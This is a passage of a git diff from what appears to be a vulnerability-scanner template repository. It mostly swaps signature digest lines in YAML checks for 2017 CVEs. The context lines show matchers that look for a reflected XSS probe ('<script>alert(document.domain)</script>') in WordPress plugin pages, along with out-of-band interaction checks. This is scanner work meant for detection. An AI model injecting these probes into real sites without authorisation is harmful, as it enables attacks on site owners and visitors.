4a0a004730450220225ab98f78e293289fce8921fb5219f8130f247165d36df880ccdd0a0de82b36022100e636cd393ec04cb001830b00a2430d4eeaac0996849518801d4ce9ee2c05f7e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 2a21fe9a9e..8bb16e832f 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Search by")' condition: and - -# digest: 490a00463044022038fe186ced239aec5b22ca37599c1ab25646cfe7c2c2d8db36a72f02ccdd5a2a02204f157e7577ce8ed1897a71228d348c04061b8fb822a0658e148d82624e6c4e3a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201700dc5be74b30e4596b93939bad1746401e29f82a6a104a9aec778d573ce6ca0220452cda234ad20373e4becb4274caf6b02833cd2bbf3db6fb9ed0b64ba333d7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index a45a8b7c95..ca2189a5dc 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Htaccess by")' condition: and - -# digest: 4b0a00483046022100d2559376213eaacca31d668bbd605cb6d0ad416cbca8fcbd25fca325ac38f0d3022100c31cd6fdcc345988fece67997fbc92caa55aa2c8b1bc5fde4bc1d8c50cf2cdb0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210099722754b9802bf0ce58f56a286b0fc5c923a8515a1e635507a118e9811b380a02204b886fe4e484982b5d8d0e29e5ffedb4f456b3bea3460f01df3da39196a8a4da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 7a9aa21582..5ca8e88148 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Buttons Pack by")' condition: and - -# digest: 4a0a0047304502203dff58452a38e2a810003ab87e04908ec62461a3c6f9a94a77f9ae49a8bb06490221008ce368f49cbf7d9bd3023be9680f1d4c836cc9e7e949f58756b338a62b34de90:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037f2668c6b0478d9701d546e0f03547d97414e5ce71d1f7791b990a47549823d022100c0c9c32b78b0e1da3ebef6e72a10035a899cf4ec0b28f926549712d0bba453ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 0f0bcc10a7..4891441570 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Login by")' condition: and - -# digest: 490a00463044022059fe53a56aefdb74d34b039b31887a9088f46da06bd348093f6ce8d716f6a20f02201b6a871d7ecb42c6dc68bb76abaa35cc81cf02fd6bf99eec0885eec4eaca19fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220164fc87f54ee83ab1b522c10fba3fdadc739b15154291a0b9c54bad3f6729dec02206cce9599aa498ee09111bfe9903162e6534146b968a11c3ca1636f509f9fd1d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 5095b9bb77..0c01621bde 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Subscriber by")' condition: and - -# digest: 490a00463044022001a0e2e47c45241b674ff59eff4960413cf818666289ab07651182ed6f16ec1002200bbcf0a3b4e518bf01a8d773fd23a7bb17905a3bcb2e6fce4ced4296fb38d8fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022051eb7b45f48d7aa7ba5d5e88c9c538ca04a1229eef37307f3cded9a3cbf65c39022055e7833c02461d0227b04edb8315320d5c7487d3e46c9416fad5cbb972c3dff0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 64cdaa37ff..0e20ed5155 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Twitter Button by")' condition: and - -# digest: 490a0046304402205540a2058fb311decbf76fa911f7859c9851a894cbf1a0cb86c47fbfce54d6ed02203d362de5790a5c73ca7c9b0fd9bfc965f8213054dbde7edf924ed28e72177441:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206a417af1368461aa4a52467f51639e720b2cac50f5a33a9bd553939b1be6aeed022069ab7bb59978087c07d12c20ff85aea7b9c1059d41bd983a0e4877e8138d9df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index aade5c1ef6..201a53e897 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and - -# digest: 4a0a004730450220661c49159de63f30bb127b160bca4437dc3a295a9d8ca6821127ba691cafc6310221009968292a68745d991738bd0e0e7537c3a7a44774b072aaf14d59bb1048acacc9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100abe41dc6153c03ba3c1d967bb3b7174b14d8fd11134c50e922a4a121a62a9643022100fb2a7a605b65051dc8baae044cff83d0240b65706cc214bb69f16381988a9360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index b60df59fb6..d6917a7ff6 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and - -# digest: 4a0a004730450220216f3cf0b2c3bda1407cc77b5f12e4212b01658d9693f86b6c1534123f24d9ac022100a7720d0258c78d0047c053681c7b5a50f8b8b34510b0bc4ccc711773adf651bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022051288af34d894fe18935efcadbe932a64796fbb59ebce5705cd17c118d68f497022100dca82158f671ab4dcd1893a9823bfbba46939f706c670bf5712d7e0cc882c671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index ef23d699f5..ecdfbc059f 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and - -# digest: 4b0a004830460221008ce8cbb3b5c0d3469051df12ee05116ced7ef8a48af992dc77fb41df13a53ac7022100e1c6d84d48cc61091ee7a90be51ab21e8ded5f2855cae76d4657657ac820c4be:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ee67c4bf0b0ec2a4b3d33c6debcf8d4c619396fa9309d88389e2465ae50dbba1022100fc5ba89cd9a6074479237a3084b564f48109c6c11337e2f22b315f0dd58be331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index e12a5c40ec..c80355f62b 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100d08213e226c26d2a4e5639fcafc82a705d47c3f02da3ab1df8646925100884b9022007bcb06b1c822c5de6e7a3a75fa61fe6ed629377a230b5bdf1b08a486dcb2439:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022008dda146f5eb781439ac3f43ab53aeff4d808e6665043a4abffac6f32fce87850220490bb39d1773aa3d5c54336d4435ddca46962b79173ad16f10ba8838eff29827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 6c7788cf29..57174228ee 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and - -# digest: 490a004630440220584b6a32133cb911d2f8c2783ea76fe3a991a826e230f91467fd9cfdf72a563c0220257183020d56994c862cf7077af64e259824bed2dd017ad312c74b1a4dc08e0e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049aa079dd5d6cf70f0c9e3908c4cd8a80b92a7bc017b2d07652561a87c0e6068022100be61618adefad3df24b4ab557455f5fe41e4f9a2df3b5f416910a16dedae564f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index b3d6fd9ec8..27d618c5d6 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and - -# digest: 4b0a00483046022100c215416f2f0afce2212c0e214dae07301a4f4cdaad7964d17e172282a3ca324102210092b4a7357e8c062348eb937bc188f1d7fa78bfc2578815d8323740b7eb5920c6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220732ee7d3c4471de996a3360f62a33b4ed3a623f6f70f6619ba0ebca22b8915c2022100dde9f3961a815291e373c9b7cd68ce4e582c3dcd06614c74ad8b0bc06d8e972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index a08630cf1f..c3d96d0f91 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100f759106b9616e329bf7be9c4c3d41bbf73de0484ed15b8054f70d19245a7d2af02203ea34adb44183d953c0b78053a4615f69c33015ebe392fa5799b77ea47f13f87:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d5517495b46faf349fc668192a57d583776a6ea13ffe325e014bdef30d529502022100a6c6228c5515b5696698c0b938c10d8e24dae88dd35f5aabb9b26813923af900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 98906072d3..32ad1331df 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and - -# digest: 4a0a004730450221008a5e7ef62f186ed8609684dd3626c1faca4dda3a162d2b4cab56dc9fcd2cc21e02200dd25b5ab0aacdfc341d9ec5162dc8468aa75eb5e5e64f7f4ad71b5d875e9982:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cda84c068f1514b929d9be942d09fa9ef92d24add435bac24bf68259f52ef509022100a4ac79da73ad31bc8646db884662830a97e8b800b798c45cbb59cfdf1d8070de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 52974aa9d7..199d99e140 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022048deacebc532a76cdfdc4aae6577be32fc6601284a80867d2ab949dfb3ceb700022100ca1e0086a46c8ae43ae855b0cd1a6bb1c643f21d5b8c7541389fed2bb315886c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eac4b3c57c85c9da2ffcfa8c94925f58de446e01232e0cefe68fa95a705d1e2702210092f665fd2bec15fd5f2363c0874fccf7ecdc8a677fc1399e0d8623a41dbbfba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index f19e0e4db9..339449e47d 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Visitors Online by")' condition: and - -# digest: 490a00463044022012f4a161d4de469a06e6e5227f5f2652309b9c60bbfe3d78a41e405ed6874478022072adf8eb27082f75682b053c1b5259f99df6b05cbea9d34e0eb103c67e63bb1a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dfde1d7167e55bc8ef0874f838086a3e6ce051f6398dadcbaf632a906b530c1102205f8670d4be8525602e82e0a2d176e8f955588c2a8aa3568a76fa83ee1e4080c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 523f7e1e74..baa8ab94a8 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and - -# digest: 4b0a0048304602210096db2bc18b2c28615f5921feca04c33f4df951e9450a9d4022c2420854ef613f022100b06eb02c47fbc7292c28718eea453c946ad9cae1af4b466c4027c4ba3542496d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203639065935ddd90c6fe36a3904b658a6c2a5279694a668086dbe2a6e241b9936022100f2a262de41d6e9c351e01480fa1c4d347b8a9c665e275cf24fc2aea46a786e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 6e8143a278..ba1ed28af6 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and - -# digest: 4b0a00483046022100a406b15b6139b3b7f819247a8ef4a772b7f423ec97894ba887a6b4dfa6b1ab30022100bbbc3100c590ccc57a0e5550b5998f81e050b416a244678074f591885a8e7d63:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c36ee839b561365fe0f17b31ee3ddbd238260dc26b8669d945a39f2fe6a9769d022100c2fcc7e85a802baca5a161006465654d0877da9c54874b1c35a3c0642d213dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 0e79439630..e28ac23754 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100a3df680b3647272d72d1d131b2f990be53bf219d619ffd125a87e6fad63ab07e02200abf7cda337cb688f22839a95e15e72197064f4f59dbf6a50fc13cf47afa4b72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d471c62efec6be0ffc13ae91b612280031d302034a165b08d732b120e0419d6022100b271aa3d0ac613420bc24b8c53137d046ee98e559ead3fbd2fd3fea0679bb400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 3922fdb406..f4f1db0687 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100e0dce719fae6ed4ed46cd832a41bc6a346d243af61c46c554392102231dc66b8022035f2defd4e8d8fe63800e2cead4ec0bb7c503f51c0493446521dc9f2679f4d16:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220135b51283ffe18237034b1dd9bc8ffda482f0d5311c82486724b1b5d49d8517e02210091fa6944319c03942c11dcaa96136e2a77770a5f621e4a32a5cd49476e56bcf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 8e2168b94a..8a208aea51 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and - -# digest: 4a0a004730450220035ca83bd8a6017e80b304a8cd64822bf0de210bcf563e2e8db162b7ff0e0221022100f0e5ae9c346b5333052bb70c33601350688c84a76dcda69f21c0fbfbfa47517c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022012e5024737aa8a7f57994f5b3822bd5bc08d473b444466fbeeee9f5e714a5fbe022100885f3439484e87e71c184caccafb84b810115a68eedbd6355bcb681587274b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index c8c928937b..f1ba041c6b 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and - -# digest: 4a0a0047304502205269fe7cef5648b6c70aed31d794d23352851cfe7d162f09188c9545d867c946022100ccc45942fe586524d981bcf28da32bb54827ac56e9487943ef8561c8272033bb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cefe7042561e3e7719a5161042e02994b949934b995e28e033f963f8d1eebbd702210083d03168e0f945db616b6ed00411550994d83c38ae067d1897cebb1be83cbfc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index a1b73dc7b9..700cbff86e 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and - -# digest: 4a0a0047304502205cc57e4f59faf86e56b0f948bf2b4742b2193885c9a3293b98cf71d8919ff773022100c90040329fa9f2edda44c89f28c80c636183fea595e0b68ea7673e5d183c4fa6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205201134b77e602887dcecc79e407fe7d11975fad3a94c54c330b9b056eb7f08e022100aba545892f64c4e4e3d669cd444875fe59192eda33643ff38437de4035956a5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index d33aecbafa..520ea577c6 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and - -# digest: 4a0a0047304502200cee3d1d7c103da4b1dd69e4e481e10bb303b29c0adaf9121b2c944597736464022100e9f615146ca1977dbdc386fa41e49273fcc7aa1d94e5241de738d005e1ba6cd3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bda63c042b34903f729a965932c4ffd66a7db0f8256ec4f2934ce07ee1321544022100f82802644bc75f9c42bf7a9210b588b4f11915bf7139b7b5f6184103c8b8cd1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 59d312b4fe..747037e028 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -43,5 +43,4 @@ http: part: body words: - "console.log" - -# digest: 4a0a004730450221008c248dbcbecbca9ce513512796d7a6f806187837e7827e8d19ed2f0da7c8a87702206be1e9d2a44ced064a291ca520d5efade3f985cdb67da51eb1b77e15dd8f62b1:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220737f5a4b94739956ccf3a86850dade502190590d33149ffd135e7a4091b61da5022008f2e2495708155ac5f743adf5ca9fd83dd2d09173f44a59ccf725fa1e6965b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 57878c8c51..26a39d3787 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -38,5 +38,4 @@ http: part: interactsh_protocol words: - "http" - -# digest: 490a004630440220147cfb7a506f2697e62e5625098c966e401017fd22c50a9143dc3b661ad57dc402205ea67ed8e185970676dfd0b5613de4917515664c79e7cc023c6c7eb7ec1df8d4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205e1580f1bed3c86cf446472e2595bd58d76d51611165818a6cd21cb1c8f3f159022100a7518cf0f9cf4d4093373e84b9e4cabb0bbab59cef19e52917268808ed96f41f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index c63d36f8af..e361b6692e 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -55,5 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a0047304502201c325940a7b2d060181262c83d84ed73937d009736d384542fd347e8d2c4727b02210096117999e51a1c98dae96f866c2abe8cb712c1e23ff48fad4100d39d0cc98f4c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220442f7bcb422a42312562834deb1b889b0b82bc1b109cec5cfed781565122a9ab02202e4bdece8f05fc436a046615fbedc714b4c998aa26fda2a3876bdb6e9fbec134:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 576504fd79..8c1de532d2 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,5 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' - -# digest: 4b0a00483046022100a6ee1f85e7517df3d601dabdd3b77237052d2ced64bcc1b94a692330c978a751022100ebb2c0980f80945c304e141823cfa7510329b8d64478f3c47567200550a1debd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c8ea720c282d45dc10a3ccb84b571a9feb0039fc048109192a6765b113a9a33f02203c0e5135abee80fb805111abf3c8c3655577633d19d550cd69a93ef740571eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 247c8ec128..e1e5997ebe 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -45,5 +45,4 @@ http: part: header words: - "text/html" - -# digest: 490a0046304402205de57123d0ec58c1b1d80660849482bf015d4127f138d07127aa2a1c12a01c8c022067ba46a60df4c9e68ca88154cd9350a3b76308e6c88db91520efbe1b58201546:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207a5e647f9112635576986f65e88dbdd3e1ee0c408bd5bec4c417238cfe396232022063117f148faa9079a211ad93437542abcd20b07ea0143b0eccb75672d0d14a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index f6ae7a554d..0a1f6b1141 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e46cc99e6b2fddacac74249f92277757193f67cd671767211ceaea0f5c096880022100fbb919a7f2b49e1a377267774694ff5cc143bfae18fd825233c8f7718a1c1e9a:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220750edb6f09ed219eaf6bf019dbd96789c3e1943b223e464df7774f270008b121022009dd15b9b14e42a1bff8eba1e1bcdfff2bdfd19df1b267e641a015e5ae87807f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 86d4a6f07f..18c1817cfb 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022041dbab7d3a90c46d738083d83fcc17b11e5babd42b72ccee66882f66c5600cbd022054283c7ced6093943ad2987aed9eb4e224d1c15b43abf7cc30010766e3a5f5ce:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202301fe9edd8f988dc1d707d747ea7f43397d298aff552c398736a9eddeb3f66d0220098d7c6982ca6f868721d62c1a7793490f31a5e56ed96a48587f4a35bc24507b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index fa7f9324d2..26c39733cb 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201d868c61853e71d0851c7c0fe300e2a60129fad15e6b2d8b818528f3cb8c8fc2022100e22cf06feba0775c0033befd12f4a688438e180b092ed89cd17586eaa27357a8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205021c67a52670f6d8ae7863f4560ef7a21ef2b5b3fe54fade9a726453303409a022100ca63393759c9ab88a495670611a1d424a4e371e2da5c1c492076fde2892e8871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index dc6b94929b..2bcaf43cd6 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022006c0a51102e81e11b975d4f76ef179133e8afaa20698c77e58f13d229dc60e3602210096ccb28e5216986d1631dd8a2e97a8bc6c7386fc069893d58631bbf5c41862c1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210086f5bffb75bdd7985e71c32edf9dac4279f3ce9b2ee0d87a4f3201276b5d054402200d5a8306ba13c0b6e0ec5a88c3df32a102b4e0421f40a63d74f9e0041c0a45ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 96ac1b0bf6..4bf4f29851 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210080cc6e1d80982cb0dc66fcecd7f5f4dbf0e705fb309f1b9b314f85947a5a1e21022100a71602b00424dc2282b83d8feca7cb8c7a5782b418c0ee5713e18e5aba898a59:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cfa9ba6f412cbbf8e520b5458b05e3b57a625ffad467df2b955b6ff0e99073de022100ddbe2c74d3c94509a2403f0832e97f25988ba29345100d53478828edf977d1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index a05957a4a0..9fc757ed80 100644 